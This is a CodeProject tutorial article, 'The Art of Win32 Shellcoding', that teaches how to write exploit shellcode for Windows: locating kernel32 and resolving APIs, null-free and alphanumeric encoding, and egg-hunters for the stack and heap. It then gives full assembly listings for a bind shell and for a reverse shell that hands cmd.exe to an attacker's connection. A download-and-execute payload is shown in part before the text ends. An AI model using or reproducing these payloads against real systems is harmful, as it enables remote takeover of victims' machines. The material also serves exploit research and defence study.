Click here to Skip to main content
65,938 articles
CodeProject is changing. Read more.
Articles / desktop / Win32

The Art of Win32 Shellcoding

4.79/5 (32 votes)
6 Feb 2012CPOL28 min read 136.4K   1.5K  
How to write a reliable shellcode on win32, how to bypass the obstacles that you will face in writing a win32 shellcode and how to implement your shellcode into Metasploit

Table of Contents

  1. Introduction
  2. Part 1: The Basics
    1. What’s Shellcode?
    2. The Types of Shellcode
  3. Part 2: Writing Shellcode
    1. Shellcode Skeleton
    2. The Tools
    3. Getting the Delta
    4. Getting the Kernel32 imagebase
    5. Getting the APIs
    6. Null-Free byte Shellcode
    7. Alphanumeric Shellcode
    8. Egg-hunting Shellcode
  4. Part 2: The Payload
    1. Socket Programming
    2. Bind Shell Payload
    3. Reverse Shell Payload
    4. Download & Execute Payload
    5. Put All Together
  5. Part 4: Implement your Shellcode into Metasploit
  6. Conclusion
  7. References
  8. Appendix I – Important Structures

1. Introduction

The secret behind any good exploit is the reliable shellcode. The shellcode is the most important element in your exploit. Working with the automated tools to generate a shellcode will not help you too much in bypassing the obstacles that you will face with every exploit. You should know how to create your own shellcode and that’s what this article will teach you.

In this article, I’m going to teach you how to write a reliable shellcode on win32, how to bypass the obstacles that you will face in writing a win32 shellcode and how to implement your shellcode into Metasploit.

2. Part 1: The Basics

2.1 What’s Shellcode?

Shellcode is simply a portable native code. This code has the ability to run at any place in memory. And this code is used from inside an Exploit to connect back to the attacker or do what the attacker needs to do.

2.2 The Types of Shellcode

Shellcode is classified by the limitations that you are facing while writing a shellcode for a specific vulnerability and it’s classified into 3 types:

Byte-Free Shellcode

In this type of shellcode, you are forced to write a shellcode without any null byte. You will be forced on that while exploiting a vulnerability in a string manipulation code inside a function. when this function uses strcpy() or sprintf() improperly … searching for the null byte in the string (as strings are null terminated) without checking on the maximum accepted size of this string … this will make this application vulnerable to the Buffer Overflow vulnerability.

In this type of vulnerabilities, if your shellcode contains a NULL byte, this byte will be interpreted as a string terminator, with the result that the program accepts the shellcode in front of the NULL byte and discards the rest. So you will have to avoid any null-byte inside your shellcode. But you will have the ability to use just one null byte … the last byte.

Alphanumeric Shellcode

In strings, it’s not common to see strange characters or Latin characters inside … in this case, some IDSs (Intrusion detection systems) detect these strings as malicious specially when they include suspicious sequence of opcodes inside … and they could detect the presence of shellcode. Not only that, but also … some applications filter the input string and accept only the normal characters and numbers (“a-z”, ”A-Z” and “0-9”). In this case, you need to write your shellcode in characters … you are forced to use only these characters and only accept bytes from 0x30 to 0x39 and from 0x40 to 0x5A and from 0x60 to 0x7A.

Egg-hunting Shellcode

In some vulnerabilities, you may have a very small buffer to put your shellcode into. Like off-by-one vulnerability, you are restricted to a specific size and you can’t send a shellcode bigger than that.

So, you could use 2 buffers to put your shellcode into, one is for your real shellcode and the second is for attacking and searching for the 1st buffer.

3. Part 2: Writing Shellcode

3.1 Shellcode Skeleton

Image 1

Any shellcode consists of 4 parts: Getting the delta, get the kernel32 imagebase, getting your APIs and the payload.

Here we will talk about getting the delta, the kernel32 imagebase and getting the APIs and in the next part of this article, we will talk about the payload.

3.2 The Tools

  • Masm: It is the Microsoft Macro Assembler. It’s a great assembler in windows and very powerful.
  • Easy Code Masm: It’s an IDE for MASM. It’s a great visualizer and has the best code completion in assembly.
  • OllyDbg: That’s your debugger and you can use it as an assembler for you.
  • Data Ripper: It’s a plugin in OllyDbg which takes any instructions you select and converts them into an array of chars suitable for C. It will help you when you need to take your shellcode into an Exploit.

3.3 Getting the Delta

The first thing you should do in your shellcode is to know where you are in the memory (the delta). This is important because you will need to get the variables in your shellcode. You can’t get the variables in your shellcode without having the absolute address of them in the memory.

To get the delta (your place in the memory), you can use call-pop sequence to get the Eip. While executing the call, the processor saves the return Eip in the stack and then pop register will get the Eip from the stack to a register. And then you will have a pointer inside your shellcode.

ASM
GETDELTA:
call NEXT
NEXT:
pop ebx

3.4 Getting the Kernel32 imagebase

To refresh you mind, APIs are functions like send(), recv() and connect(). Each group of functions is written inside a library. These libraries are written into files with extension (.dll). Every library specializes in a type of function like: winsock.dll is for network APIs like send() or recv(). And user32.dll is for windows APIs like MessageBoxA() and CreateWindow().

And kernel32.dll is for the core windows APIs. It has APIs like LoadLibrary() which loads any other library. And GetProcAddress() which gets the address of any API inside a library loaded in the memory.

So, to reach any API, you must get the address of the kernel32.dll in the memory and have the ability to get any API inside it.

While any application is being loaded in the memory, the Windows loads beside it the core libraries like kernel32.dll and ntdll.dll and saves the addresses of these libraries in a place in memory called Process Environment Block (PEB). So, we will retrieve the address of kernel32.dll from the PEB as shown in the next Listing:

ASM
mov eax,dword ptr fs:[30h]
mov eax,dword ptr [eax+0Ch]
mov ebx,dword ptr [eax+1Ch]
mov ebx,dword ptr [ebx]
mov esi,dword ptr [ebx+8h]  

The first line gets the PEB address from the FS segment register. And then, the second and third line gets the PEB->LoaderData->InInitializationOrderModuleList.

The InInitializationOrderModuleList is a double linked list that contains the whole loaded modules (PE Files) in memory (like kernel32.dll, ntdll.dll and the application itself) with the imagebase, entrypoint and the filename of each one of them.

The first entry that you will see in InInitializationOrderModuleList is ntdll.dll. To get the kernel32.dll, you must go to the next item in the list. So, in the fourth line, we get the next item with ListEntry->FLink. And at last, we get the imagebase from the available information about the DLL in the 5th line.

3.5 Getting the APIs

To get the APIs, you should walk through the PE structure of the kernel32.dll. I won’t talk much about the PE structure, but I’ll talk only about the Export Table in the Data Directory.

The Export Table consists of 3 arrays. The first array is AddressOfNames and it contains the names of all functions inside the DLL file. And the second array is AddressOfFunctions and it contains the addresses of all functions.

Image 2

But, the problem in these two arrays is that they are aligned with different alignment. For example, GetProcAddress is the No.3 in the AddressOfNames but it’s the No.5 in the AddressOfFunctions.

To pass this problem, Windows creates a third array named AddressOfNameOrdinals. This array is aligned with same alignment of AddressOfNames and contains the index of every item in the AddressOfFunctions.

So, to find your APIs, you should search for your API’s name in the AddressOfNames and then take the index of it and go to the AddressOfNameOrdinals to find the index of your API in the AddressOfFunctions and then, go to AddressOfFunctions to get the address of your API. Don’t forget that all the addresses in these arrays are RVA. This means that their addresses are relative to the address of the beginning of the PE file. So, you should add the kernel32 imagebase to every address you work with.

In the next code listing, we will get the address of our APIs by calculating a checksum from the characters of every API in kernel32 and compare it with the needed APIs’ checksums.

ASM
;Inputs:
;-------
;Esi --> Kernelbase
;Ebx -->The Array Of API Addresses that we will save in

GetAPIs Proc

 Local AddressFunctions:DWord
 Local AddressOfNameOrdinals:DWord
 Local AddressNames:DWord
 Local NumberOfNames:DWord

 Getting_PE_Header:
Mov Edi, Esi         ;Kernel32 imagebase
Mov Eax, [Esi].IMAGE_DOS_HEADER.e_lfanew
Add Esi, Eax         ;Esi-->PE Header Edi-->MZ Header
Getting_Export_Table:
Mov Eax, [Esi].IMAGE_NT_HEADERS.OptionalHeader.DataDirectory[0].VirtualAddress
Add Eax, Edi
Mov Esi, Eax
Getting_Arrays:
Mov Eax, [Esi].IMAGE_EXPORT_DIRECTORY.AddressOfFunctions
Add Eax, Edi
Mov AddressFunctions, Eax ;the first array
Mov Eax, [Esi].IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals
Add Eax, Edi
Mov AddressOfNameOrdinals, Eax ;the second array
Mov Eax, [Esi].IMAGE_EXPORT_DIRECTORY.AddressOfNames
Add Eax, Edi
Mov AddressNames, Eax     ;the third array
Mov Eax, [Esi].IMAGE_EXPORT_DIRECTORY.NumberOfNames
Mov NumberOfNames, Eax     ;the number of APIs
Push Esi
Mov Esi, AddressNames
Xor Ecx, Ecx
GetTheAPIs:
Lodsd
Push Esi
Lea Esi, [Eax + Edi]     ;RVA + imagebase = VA
Xor Edx,Edx
Xor Eax,Eax
Checksum_Calc:
Lodsb
Test Eax, Eax        ;Avoid the null byte in Cmp Eax,0
Jz CheckFunction
Add Edx,Eax
Xor Edx,Eax
Inc Edx
Jmp Checksum_Calc
CheckFunction:
Pop Esi
Xor Eax, Eax         ;The index of this API
Cmp Edx, 0AAAAAAAAH     ;FirstAPI
Jz FoundAddress
Cmp Edx, 0BBBBBBBBh    ;SecondAPI
Inc Eax
Jz FoundAddress
Cmp Edx, 0CCCCCCCCh     ;ThirdAPI
Inc Eax
Jz FoundAddress
Xor Eax, Eax
Inc Ecx
Cmp Ecx,NumberOfNames
Jz EndFunc
Jmp GetTheAPIs
FoundAddress:
Mov Edx, Esi         ;save it temporary in edx
Pop Esi             ;Esi --> PE Header
Push Eax             ;save the index of the API
Mov Eax, AddressOfNameOrdinals
Movzx Ecx, Word Ptr [Eax + Ecx * 2]
Mov Eax, AddressFunctions
Mov Eax, DWord Ptr [Eax + Ecx * 4]
Add Eax, Edi
Pop Ecx             ;Get The Index of the API
Mov [Ebx + Ecx * 4], Eax
Push Esi
Mov Esi, Edx
Jmp GetTheAPIs
EndFunc:
Mov Esi, Edi
Ret
GetAPIs EndP

In this code, we get the PE Header and then, we get the Export Table from the Data Directory. After that, we get the 3 arrays plus the number of entries in these arrays.

After we get all the information we need, we begin looping on the entries of the AddressOfNames array. We load every entry by using “Lodsd” which loads 4 bytes from memory at “Esi”. We - then - calculate the checksum of the API and compare it with our needed APIs’ checksums.

After we get our API, we get the address of it using the remaining two arrays. And at last, we save it in an array to call them while needed.

3.6 Null-Free byte Shellcode

Writing clean shellcode (or null-free shellcode) is not hard even if you know the instructions that give you null bytes and how to avoid them. The most common instructions that give you null byte are “mov eax,XX”, “cmp eax,0” or “call Next” as you see on getting the delta.

In the Table, you will see these common instructions with its equivalent bytes and how to avoid them.

Null-Byte InstructionBinary FormNull Free InstructionBinary Form
mov eax,5B8 00000005mov al,5B0 05
call nextE8 00000000jmp next/call prevEB 05/ E8 F9FFFFFF
cmp eax,083F8 00test eax,eax85C0
mov eax,0B8 00000000xor eax,eax33C0

To understand this table, the mov and call instructions take immediate (or offset) with size 32bits. These 32bits in most cases will contain null bytes. To avoid that, we use another instruction which takes only one byte (8bit) like jmp or mov al,XX (as al is 8bit size).

In “call” instruction, the 4 bytes next to it are the offset between the call instruction+5 to the place where your call will reach. You can use the “call” with a previous location so the offset will be negative and the offset will be something like “0xFFFFFFXX”. So, no null byte is inside.

In the code Listing on how to get the delta, we didn’t avoid the null byte. So, to avoid it, we will use the tricks in the Table 3.5.1 and use jmp/call instead of call next as shown in the code Listing below:

ASM
GETDELTA:
jmp NEXT
PREV:
pop ebx
jmp END_GETDELTA
NEXT:
call PREV
END_GETDELTA:

The binary for of this shellcode become like this: “0xEB, 0x03, 0x5B, 0xEB, 0x05, 0xE8, 0xF8, 0xFF,0xFF, 0xFF” instead of “0xE8,0x00, 0x00, 0x00, 0x00, 0x5B”. As you see, there’s no null byte.

3.7 Alphanumeric Shellcode

Alphanumeric shellcode is maybe the hardest to write and produce. Writing alphanumeric shellcode that can get the delta or get the APIs is nearly impossible.

So, in this type of shellcode, we use an encoder. Encoder is simply a shellcode to only decrypt (or decode) another shellcode and execute it. In this type of shellcode, you can’t get the delta (as call XX is in bytes is “E8 XXXXXXXX”) and you don’t have “0xE8” in your available bytes and also you don’t have “0xFF”.

Not only that but also, you don’t have “mov” or “add” or “sub” or any mathematical instructions except “xor” and “imul” and you have also “push”, ”pop”,”pushad” and ”popad” instructions.

Also, there are restrictions on the type of the destination and the source of the instruction like “xor eax,ecx” is not allowed and “xor dword ptr [eax],ecx” is not allowed.

To understand this correctly, you should know more on how your assembler (masm or nasm) assembles your instruction.

I won’t go into details but you can check “Intel® 64 and IA-32 Architectures 2A” and get more information on this topic. But in brief, that’s the shape of your instruction while assembled in binary form:

Image 3

The ModRM is the descriptor of the destination and the source of your instruction. The assembler creates the ModRM from a table and every shape of the source and the destination has a different shape in the binary form.

In the alphanumeric shellcode, the ModRM value forces you to choose only specific shapes of you instructions as you see in the table:

Allowed Shapes
xor dword ptr [exx + disp8],exx
xor exx,dword ptr [exx + disp8]
xor dword ptr [exx],esi/edi
xor dword ptr [disp32],esi/edi
xor dword ptr FS:[...],exx (FS allowed)
xor dword ptr [exx+esi],esi/edi (exx except edi)

ModRM has an extension named SIB. SIB is also a byte like ModRM which gives you the third item in the destination or the second item without a displacement like “[eax+esi*4+XXXX] or like the last entry in previous Table “[exx+esi]”. SIB is a byte and should be between the limits “30-39, 41-5A, 61-7A”.

In shellcode, I don’t think you will use anything rather than what’s inside the previous Table and you can read more about them in “Intel® 64 and IA-32 Architectures 2A”.

So, to write your encoder/decoder, you will have only “imul” and “xor” as arithmetic operations. And you have only the stack to save your decoded data inside. You can encode them by using two 4 bytes numbers (integers) and these numbers are acceptable (in the limits). And these numbers, when you multiply them, you should have the number that you need (4 bytes from your original shellcode) like this:

ASM
push 35356746
push esp
pop ecx
imul edi,dword ptr [ecx],45653456
pop edx
push edi

This code multiplies 0x35356746 with 0x45653456 and generates 0x558884E9 which will be decoded as “test cl,ch” and “mov byte ptr [ebp],dl”. That’s just an example on how to create an encoder and decoder.

It’s hard to find two numbers when you multiply them give you the 4 bytes that you need. Or you may fall into a very large loop to find these numbers. So you can use the 2 bytes like this:

ASM
push 3030786F
pop eax
push ax
push esp
pop ecx
imul di,word ptr [ecx],3445
push di

This code multiplies 0x786F (you can ignore the 0x3030) with 0x3445 to generate 0x01EB which is equivalent to “Jmp next”. To generate these two numbers, I created a C code which generates these numbers as you see them in this code:

C
int YourNumber = 0x000001EB;
for (short i=0x3030;i<0x7A7A;i++){
    for (short l=0x3030;l<0x7A7A;l++){
        char* n = (char*)&i;
        char* m = (char*)&l;
        if (((i * l)& 0xFFFF)==YourNumber){
            for(int s=0;s<2;s++){
            if (!(((n[s] > 0x30 && n[s] < 0x39) || \
               (n[s] > 0x41 && n[s] < 0x5A) || \
               (n[s] > 0x61 && n[s] < 0x7A)) && \
               ((m[s] > 0x30 && m[s] < 0x39) || \
               (m[s] > 0x41 && m[s] < 0x5A) || \
               (m[s] > 0x61 && m[s] < 0x7A))))
                                            goto Not_Yet;
            }
            cout << (int*)i << " " << (int*)l << " " << (int*)((l*i) & 0xFFFF)<< "\n";
        }
Not_Yet:
        continue;
    }
};

In all of these encoders, you will see that the shellcode is decoded in the stack using “push” instruction. So, beware of the stack direction as esp decreases by push. So, the data will be arranged wrong if you are not aware of that.

Also notice that your processor (Intel) uses the little endian for representing numbers. So, if you have an instruction like “Jmp +1” and this instruction in bytes will be “EB 01”, you will need to generate the number 0x01EB and push it … not 0xEB01.

After finishing all of this, you should pass the execution to the stack to begin executing your original shellcode. To do that, you should find a way to set the Eip to the Esp.

As you don’t have “call” or “jmp exx”, you don’t have any way to pass the execution rather than SEH. SEH is the Structured Exception Handling and it’s created by Windows to handle exceptions. It’s a single linked list with the last entry saved in the FS:[0] or you can say … at the beginning of the Thread Environment Block (TIB) as FS is pointing to TIB and followed with TEB (Thread Environment Block) which has the pointer to the PEB (Process Environment Block) at F:[30] that we use to get the kernel32 address.

Don’t worry about all of this, you should only know that it’s saved in FS[0]. And it’s a single linked list with this structure:

C++
struct SEH_RECORD
{
      SEH_RECORD *sehRecord;
      DWORD SEHandler;
};

The sehRecord points to the next entry in the list and the SEHandler points to a code which will handle the error.

When an error occurs, the window passes the execution to the code at SEHandler to handle the error and return again. So, we can save the esp at the SEHandler and raise an error (read from an invalid pointer for example) to make windows pass the execution to our shellcode. So, we will easily run our decoded shellcode.

The FS:[0] saves inside it the pointer to the last entry in the linked list (the last created and the first to be used). So we will create a new entry with our esp as SEHandler and with the pointer that we take from FS:[0] as a sehRecord and saves the pointer to this entry at FS:[0]. That’s the code in an Alphanumeric shape:

ASM
push 396A6A71
pop eax
xor eax,396A6A71
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
popad
xor edi,dword ptr fs:[eax]
push esp
push edi
push esp
xor esi,dword ptr [esp+esi]
pop ecx
xor dword ptr fs:[eax],edi
xor dword ptr fs:[eax],esi

The first lines set the eax to zero (xor a number with itself returns zero) and then we use 8 pushes and popad to set registers to zero (popad doesn’t modify the esp). And after that, we gets the value of the FS:[0] by using xor (number xor 0 = the same number).

And then we begin to create the SEH entry by pushing esp (as it now points to our code) and push edi (the next sehRecord).

In “xor esi,dword ptr [eax+esi]”, we tried here to make esi == esp (as pop esi equal to 0x5E “^” and it’s outside the limits). And then we set the FS:[0] with zero by xoring it with the same value of it. And at last, we set it with esp.

The code is so small near 37 bytes. And if you see this code in the binary view (ASCII view), you will see it equal to “hqjj9X5qjj9PWPPSRPPad38TWT344Yd18d10” … nothing except normal characters.

Now, I think (and I hope) that you can program a full functional Alphanumeric shellcode in windows easily. Now we will jump to the Egg-hunting shellcode.

3.8 Egg-hunting Shellcode

Egg-hunting shellcode (as we described in part 1) is an egg searcher or shellcode searcher. To search for a shellcode, this shellcode should have a mark (4 bytes number) that you will search for it like 0xBBBBBBBB or anything you choose.

The second thing, you should know where will be your bigger shellcode, is it in the stack or in heap? Or you can ask: is it a local variable like “char buff[200]” or it’s allocated dynamically like “char* buff = malloc(200)”?

If it is in the stack, you could easily search for the shellcode. In the TIB (Thread Information Block) that we described earlier, The 2nd and the 3rd items (FS:[4] and FS:[8]) are the beginning of the stack and the end of the stack. So, you can search for your mark between these pointers. Let’s examine the code:

ASM
mov ecx,dword ptr fs:[eax] ; the end of the stack
add eax,4
mov edi,dword ptr fs:[eax] ; the beginning of the stack
sub ecx,edi ; Getting the size
mov eax,BBBBBBBC ; not BB to not find itself by wrong
dec eax ; became == 0xBBBBBBBB
NOT_YET:
repne scasb
cmp dword ptr [edi-1],eax
jnz NOT_YET
add edi,3
call edi

As you see, it’s very simple and less than 30 bytes. It only searches for 1 byte from the mark and if found, it compares the whole dword with 0xBBBBBBBB and at last … it calls the new shellcode.

In stack, it’s simple. But for heap, it’s a bit complicated.

To understand how we will search in the heap, you need first to understand what the heap is. And the structure of the heap. I will describe it in brief to understand the subject of the topic. And you can read more about this topic on the internet.

When you allocate a piece of memory (20 byte for example) using the virtual memory manager (the main windows memory manager). It will allocate for you one memory page(1024 bytes) as it’s the minimum size in the Virtual Memory Manager even you only need just 20 bytes. So, because of that, the heap is created. The heap is created mainly to avoid this waste of memory and allocates smaller blocks of memory for you to use.

To do that, the heap manager allocates a large chunk of memory using the Virtual Memory Manager (VirtualAlloc API or similar functions) and then allocates small blocks inside. If this large chunk is exhausted … including the main committed pages and the reserved pages in memory, the heap manager allocates another large chunk of memory. These chunks are named Segments. Remember it as we will use them to get the size of the process heap.

Let’s go practical, when an application calls to malloc or HeapAlloc. The heap manager allocates a block of memory (with the size that the application needs) in one of the process heaps (could have more than one) in a segment inside the heap memory. To get these Heaps, you can get them from inside the Process Environment Block (PEB) +0x90 as you see in this snippet of the PEB that contains the information that we need.

    +0x088 NumberOfHeaps
    +0x08c MaximumNumberOfHeaps
    +0x090 *ProcessHeaps

As you see, you can get PEB from FS:[30] and then get an array with the process heaps from (PEB+0x90) and the number of entries inside this array (number of heaps) from PEB+88 and you can loop on them to search for your mark inside.

But you will ask me … where I can get the size of these heaps in memory? The best way to get the size is to get the last entry (allocated memory) in the Segment (or after the last entry).

To get that, you can get the Segments form every heap (in the array … ProcessHeaps). The Segments are an array of 64 entries and the first item in the array is in (HeapAddress +58) and you will usually see only one segment inside the heap.

So you will go to HeapAddress+58 to get the first (and only)segment in the heap. And then, from inside the Segment, you will get the LastEntryInSegment at Segment+38. And then, you will subtract it from the beginning of the Heap to get the size of the allocated memory inside the heap to search for the mark. Let’s see the code.

ASM
xor eax,eax
mov edx,dword ptr fs:[eax+30]     ;Get The PEB
add eax,7F
add eax,11                     ;set eax == 90 (avoiding null bytes)
mov esi,dword ptr [eax+edx]         ;edx + 90 --> *ProcessHeaps
mov ecx,dword ptr [eax+edx-4]     ;edx + 88 --> NumberOfHeaps
GET_HEAP:
lods dword ptr [esi]             ;Get Heap Entry
push ecx                     ;Save NumberOfHeaps
mov edi,eax
mov eax,dword ptr [eax+58]         ;Get 1st entry in Segments[64] array
mov ecx,dword ptr [eax+38]         ;Get LastEntryInSegment
sub ecx,edi                 ;Get SizeOfHeap
mov eax,BBBBBBBC
dec eax
NO_YET:
repne scas byte ptr es:[edi]         ;searching for the 0xBB
test ecx,ecx                ;Didn’t find?
je NEXT_HEAP                ;go to the next heap
cmp dword ptr [edi-1],eax        ;get 0xBB .. check on 0xBBBBBBBB
jnz NO_YET
call dword ptr [edi+3]            ;we got it … let’s call to it
NEXT_HEAP:
pop ecx                    ;not yet, let’s go the next heap
dec ecx
test ecx,ecx                ;is it the last heap?
jnz GET_HEAP

The code is fully commented. And if you compile it, you will see it is less than 60 bytes. Not so large and null free byte. I recommend you to compile it and debug it to understand the topic more. And you should read more about Heap and the Allocation mechanism.

4. Part 2: The Payload

In this part, we will talk about the payload. The payload is what the attacker intends to do or what the whole shellcode is written.

All payloads we will describe are based on the internet communications. As you know, the main target for any attacker is to control the machine and send commands or receive sensitive information from the victim.

The communications in any operating system are based on Sockets. Socket is an endpoint of the communication like your telephone or your mobile and it’s the handle of any communication inside the OS.

The socket could be a client and connect to a machine or could be a server. I’ll not go so deep in this as I assume you know about the client/server communication and about the IP (the Internet Address) and the Port (a number marks the application which connects to the internet or listen for a connection).

Now let’s talk about programming.

4.1 Socket Programming

To begin using the sockets, you should first call to WSAStartup() to specify the minimum version you need to use and get more details about the socket interface in this windows Version. This API is like this:

C++
int WSAStartup ( WORD wVersionRequired, LPWSADATA lpWSAData );

Calling it is very easy … it’s like this:

C++
WSADATA wsaData;
WSAStartup( 0x190, &wsaData );

After that, you need to create your own socket … we will use WSASocketA API to create our socket. I also forgot to say that all these APIs are from WS2_32.dll Library. The implementation of this API is like this:

C++
SOCKET WSASocketA ( int af, int type, int protocol, int unimportant );

The 1st Argument is AF and it takes AF_INET and nothing else. And the 2nd argument defines the type of the transport layer (TCP or UDP) … as we use TCP so we will use SOCK_STREAM.

The other arguments are not important and you can set them to 0.

Now we have the telephone (Socket) that we will connect with. We should now specify if we want to connect to a server to wait (listen) for a connection from a client.

To connect to a client, we should have the IP and the Port of your server. The connect API is:

C++
int connect (SOCKET s,const struct sockaddr* name,int namelen);

The ‘name’ argument is a structure which takes the IP, the Port and the protocol (TCP or UDP). And ‘namelen’ is the size of the structure. To listen to a port, you should call to 2 APIs (bind and listen) … these APIs are similar to connect API as you see:

C++
int bind(int sockfd, struct sockaddr *my_addr, int addrlen);
int listen(int sockfd, int backlog);

The difference between bind and connect is:

  1. The IP in bind you usually set it to INADDR_ANY and this means that you accept any connection from any IP
  2. The port in bind is the port that you need to listen on and wait for connections from it

The listen APIs begin the listening on that port given the socket number (the 2nd parameter is unimportant for now).

To get any connection and accept it … you should call to accept API … its shape is:

C++
int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);

This API takes the socket number and returns 3 parameters:

  1. The Socket number of the connector … you will use it for any send & recv … only on close you could use your socket number to stop any incoming connections
  2. Addr: It returns the IP and the Port of the connector
  3. Addrlen: It returns the size of structure sockaddr

Now you have an established connection … you can use send or recv to communicate. But for our shell … we will use CreateProcessA to open the cmd.exe or “CMD” and set the standard input, output and error to be thrown to the attacker via the connection that we established directly. I will show you everything now on the payloads.

4.2 Bind Shell Payload

I’ll assume that you got the needed APIs and you start to write the payload. I’ll list to you the payload code in Assembly. And at the end, I’ll put them all together and give you a complete shellcode.

ASM
Lea Eax, WSAStartupData
Push Eax
Push 190H
Call WSAStartup ;call to WSAStartup to start the connections
Xor Eax, Eax
Push Eax ;Flags = 0
Push Eax ;Group = 0
Push Eax ;pWSAprotocol = NULL
Push Eax ;Protocol = IPPROTO_IP
Push SOCK_STREAM
Push AF_INET
Call WSASocketA ;Create our socket (your phone who will connect or 
    listen to/from the client
Mov Edi, Eax ;save it in Edi
Xor Esi, Esi
Mov Ebx, DataOffset
Mov Cx, Word Ptr [Ebx]
Mov sAddr.sin_port, Cx ;Port Number
Mov sAddr.sin_family, AF_INET
Mov sAddr.sin_addr, Esi ;INADDR_ANY
Lea Eax, sAddr
Push 10H
Push Eax
Push Edi
Call bind
Push 0
Push Edi
Call listen
Push Esi
Push Esi
Push Edi
Call accept
Mov Edi, Eax
Push Edi
Xor Ecx, Ecx
Mov Cl, SizeOf Startup
Lea Edi, Startup
Xor Eax, Eax
Rep Stosb
Mov Cl, SizeOf ProcInfo
Lea Edi, ProcInfo
Xor Eax, Eax
Rep Stosb
Pop Edi
Mov Startup.hStdInput, Edi
Mov Startup.hStdOutput, Edi
Mov Startup.hStdError, Edi
Mov Byte Ptr [Startup.cb], SizeOf Startup
Mov Word Ptr [Startup.dwFlags], STARTF_USESTDHANDLES Or STARTF_USESHOWWINDOW
Xor Eax, Eax
Push Ax
Mov Al, 'D'
Push Eax
Mov Ax, 'MC'
Push Ax
Mov Eax, Esp
Lea Ecx, ProcInfo
Lea Edx, Startup
Push Ecx
Push Edx
Push Esi
Push Esi
Push Esi
Push 1
Push Esi
Push Esi
Push Eax
Push Esi
Call CreateProcessA
Push INFINITE
Push ProcInfo.hProcess
Call WaitForSingleObject
Ret
MainShellcode EndP
DATA:
Port DW 5C11H ;5C11H == 4444 (port 4444)

As you see in this code, we first call to WSAStartup and then we create our socket and call bind and listen to prepare our server.

Before calling bind, we got the port number from the last 2 bytes of the shellcode by getting the delta plus the offset of the last 2 bytes and save that in DataOffset. After that, we read the port number and listen to this port.

You will not see the steps we do to get the delta and the data offset in Listing 4.2.1 as we described it in getting the delta section. And I will put all these parts together again in a complete shellcode.

After that, we prepare for the CreateProcessA … the API shape is that:

C++
BOOL CreateProcess(
 LPCTSTR lpApplicationName,    // pointer to name of executable module
 LPTSTR lpCommandLine,    // pointer to command line string
 LPSECURITY_ATTRIBUTES lpProcessAttributes,
 LPSECURITY_ATTRIBUTES lpThreadAttributes,
    BOOL bInheritHandles,    // handle inheritance flag
    DWORD dwCreationFlags,    // creation flags
    LPVOID lpEnvironment,    // pointer to new environment block
    LPCTSTR lpCurrentDirectory,    // pointer to current directory name
    LPSTARTUPINFO lpStartupInfo,    // pointer to STARTUPINFO
    LPPROCESS_INFORMATION lpProcessInformation     // pointer to PROCESS_INFORMATION
   );

Most of these parameters are unimportant for us except 3 parameters:

  1. lpCommandline: We will set this argument to “CMD” to refer to the command shell
  2. lpStartupInfo: In this argument, we will set the process to throw its output and takes its input from the socket
  3. lpProcessInformation: That’s where the createProcess outputs the ProcessID, ThreadID and related imformation. This data is not important to us but we should allocate a space with size equal to the size of PROCESS_INFORMATION structure.

As you can see, we allocate a local variable for the lpStartupInfo and set all variables inside it to zero. And after that, we set the standard input, output and error to the socket number that returned from accept API (the attacker socket number) to redirect the output and the input to the attacker.

At the end, we create our Process and then we call to WaitForSingleObject to wait for our Process to finish. If you didn’t call WaitForSingleObject, nothing will happen but you can (after the process finish) close the communication and close the sockets after that.

4.3 Reverse Shell Payload

The Reverse Shell is very similar to the Bind Shell as you see in the code below:

ASM
Lea Eax, WSAStartupData
Push Eax
Push 190H
Call WSAStartup ;call to WSAStartup to start the connections
Xor Eax, Eax
Push Eax ;Flags = 0
Push Eax ;Group = 0
Push Eax ;pWSAprotocol = NULL
Push Eax ;Protocol = IPPROTO_IP
Push SOCK_STREAM
Push AF_INET
Call WSASocketA ;Create our socket (your phone who will 
    connect or listen to/from the client
Mov Edi, Eax ;save it in Edi
Xor Esi, Esi
Mov Ebx, DataOffset
Mov Cx, Word Ptr [Ebx]
Mov sAddr.sin_port, Cx ;Port Number
Mov sAddr.sin_family, AF_INET
Inc Ebx
Inc Ebx
Push Ebx
Call gethostbyname
Mov Ebx, [Eax + 1CH] ;IP
Mov sAddr.sin_addr, Ebx
Lea Eax, sAddr
Push SizeOf sAddr
Push Eax
Push Edi
Call connect
Push Edi
Xor Ecx, Ecx
Mov Cl, SizeOf Startup
Lea Edi, Startup
Xor Eax, Eax
Rep Stosb
Mov Cl, SizeOf ProcInfo
Lea Edi, ProcInfo
Xor Eax, Eax
Rep Stosb
Pop Edi
Mov Startup.hStdInput, Edi
Mov Startup.hStdOutput, Edi
Mov Startup.hStdError, Edi
Mov Byte Ptr [Startup.cb], SizeOf Startup
Mov Word Ptr [Startup.dwFlags], STARTF_USESTDHANDLES Or STARTF_USESHOWWINDOW
Xor Eax, Eax
Push Ax
Mov Al, 'D'
Push Eax
Mov Ax, 'MC'
Push Ax
Mov Eax, Esp
Lea Ecx, ProcInfo
Lea Edx, Startup
Push Ecx
Push Edx
Push Esi
Push Esi
Push Esi
Push 1
Push Esi
Push Esi
Push Eax
Push Esi
Call CreateProcessA
Push INFINITE
Push ProcInfo.hProcess
Call WaitForSingleObject
Ret
MainShellcode EndP
DATA:
Port DW 5C11H ;5C11H == 4444 (port 4444)
IP DB "127.0.0.1", 0

In the reverse shell, we take the IP from the DATA at the end of the shellcode. And then, we calls to gethostbyname(name) which takes the host name (website, localhost or an IP) and returns a structure named hostent which has the information about the host.

The hostent has a variable named h_addr_list which has the IP of the host. This variable is at offset 0x1C from the beginning of the hostent structure.

So we take the IP fromh_addr_list and then pass it to connect API to connect to the attacker server. After that, we create the command shell process via CreateProcessA given the standard input, output and error equal to our socket (our socket not the return of connect API).

Now, we can create a bind shell and a reverse shell payloads. Now let’s jump to the last payload we have … download & execute.

4.4 Download & Execute Payload

You have many ways to create a DownExec Shellcode. So, I decided to choose the easiest way (and the smaller way) to write a DownExec shellcode.

I decided to use a very powerful and easy-to-use API named URLDownloadToFileA given by urlmon.dll Library.

This API takes only 2 parameters:

  1. URL: The URL to download the file from
  2. Filename: The place where you need to save the file in (including the name of the file)

It’s very simple to use as you see in the code below:

ASM
Mov Edi, URLOffset
Xor Eax, Eax
Mov Al, 90H
Repne Scasb
Mov Byte Ptr [Edi - 1], Ah
Mov Filename, Edi
Mov Al, 200
Sub Esp, Eax
Mov Esi, Esp
Push Eax
Push Esi
Push Edi
Call ExpandEnvironmentStringsA
Xor Eax, Eax
Push Eax
